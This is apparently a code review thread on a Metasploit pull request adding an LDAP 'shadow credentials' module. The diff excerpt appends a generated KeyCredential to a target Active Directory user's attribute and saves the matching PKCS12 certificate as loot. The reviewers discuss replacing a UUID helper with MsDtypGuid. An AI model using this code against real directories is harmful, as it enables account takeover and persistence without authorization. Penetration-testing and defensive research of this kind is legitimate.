modules/auxiliary/admin/ldap/shadow_credentials.rb

```diff
@@ -0,0 +1,311 @@
+    credential_entries = obj[ATTRIBUTE]
+    if credential_entries.nil?
+      credential_entries = []
+    end
+    key, cert = generate_key_and_cert(datastore['TARGET_USER'])
+    credential = Rex::Proto::MsAdts::KeyCredential.new
+    credential.set_key(key.public_key, Rex::Proto::MsAdts::KeyCredential::KEY_USAGE_NGC)
+    now = ::Time.now
+    credential.set_times(now, now)
+    credential_entries.append(credential)
+    update_list = credentials_to_ldap_format(credential_entries, obj['dn'])
+
+    unless @ldap.replace_attribute(obj['dn'], ATTRIBUTE, update_list)
+      warn_on_likely_user_error
+      fail_with_ldap_error("Failed to update the #{ATTRIBUTE} attribute.")
+    end
+
+    pkcs12 = OpenSSL::PKCS12.create('', '', key, cert)
+    store_cert(pkcs12)
+
+    print_good("Successfully updated the #{ATTRIBUTE} attribute; certificate with device ID #{bytes_to_uuid(credential.device_id)}")
+  end
+
+  def store_cert(pkcs12)
+    service_data = ldap_service_data
+    credential_data = {
+      **service_data,
+      address: service_data[:host],
+      port: rport,
+      protocol: service_data[:proto],
+      service_name: service_data[:name],
+      workspace_id: myworkspace_id,
+      username: datastore['TARGET_USER'],
+      private_type: :pkcs12,
+      # pkcs12 is a binary format, but for persisting we Base64 encode it
+      private_data: Base64.strict_encode64(pkcs12.to_der),
+      origin_type: :service,
+      module_fullname: fullname
+    }
+    create_credential(credential_data)
+
+    info = "#{datastore['DOMAIN']}\\#{datastore['TARGET_USER']} Certificate"
+    stored_path = store_loot('windows.shadowcreds', 'application/x-pkcs12', rhost, pkcs12.to_der, 'certificate.pfx', info)
+    print_status("Certificate stored at: #{stored_path}")
+  end
+
+  def ldap_service_data
+    {
+      host: rhost,
+      port: rport,
+      proto: 'tcp',
+      name: 'ldap',
+      info: "Module: #{fullname}, #{datastore['LDAP::AUTH']} authentication"
+    }
+  end
+
+  def credentials_to_ldap_format(entries, dn)
+    entries.map do |entry|
+      struct = entry.to_struct
+      dn_binary = Rex::Proto::LDAP::DnBinary.new(dn, struct.to_binary_s)
+
+      dn_binary.encode
+    end
+  end
+
+  def bytes_to_uuid(bytes)
+    if bytes.nil?
+      return '(no device ID)'
+    end
+
+    # Convert each byte to a 2-digit hexadecimal string
+    hex_strings = bytes.bytes.map { |b| b.to_s(16).rjust(2, '0') }
+
+    # Arrange the hex strings in the correct order for UUID format
+    uuid_parts = [
+      hex_strings[0..3].reverse.join,  # First 4 bytes (little-endian)
+      hex_strings[4..5].reverse.join,  # Next 2 bytes (little-endian)
+      hex_strings[6..7].reverse.join,  # Next 2 bytes (little-endian)
+      hex_strings[8..9].join,  # Next 2 bytes (big-endian)
+      hex_strings[10..15].join # Last 6 bytes (big-endian)
+    ]
+
+    # Join the parts with hyphens to form the complete UUID
+    uuid = uuid_parts.join('-')
+
+    return uuid
```

Comment:
I think this could be simplified by reusing `MsDtypeGuid` here.

```suggestion
    Rex::Proto::MsDtyp::MsDtypGuid.new(bytes).to_s
```

Reply:
Was looking for this functionality somewhere - thanks!

Reply:
Was this able to work for you? It doesn't look like it was switched to the `MsDtypGuid` class.

Reply:
I changed it in the `key_credential` object itself - it worked well. I did forget to remove this function, though, which was kind of the point. I've amended that. Thanks.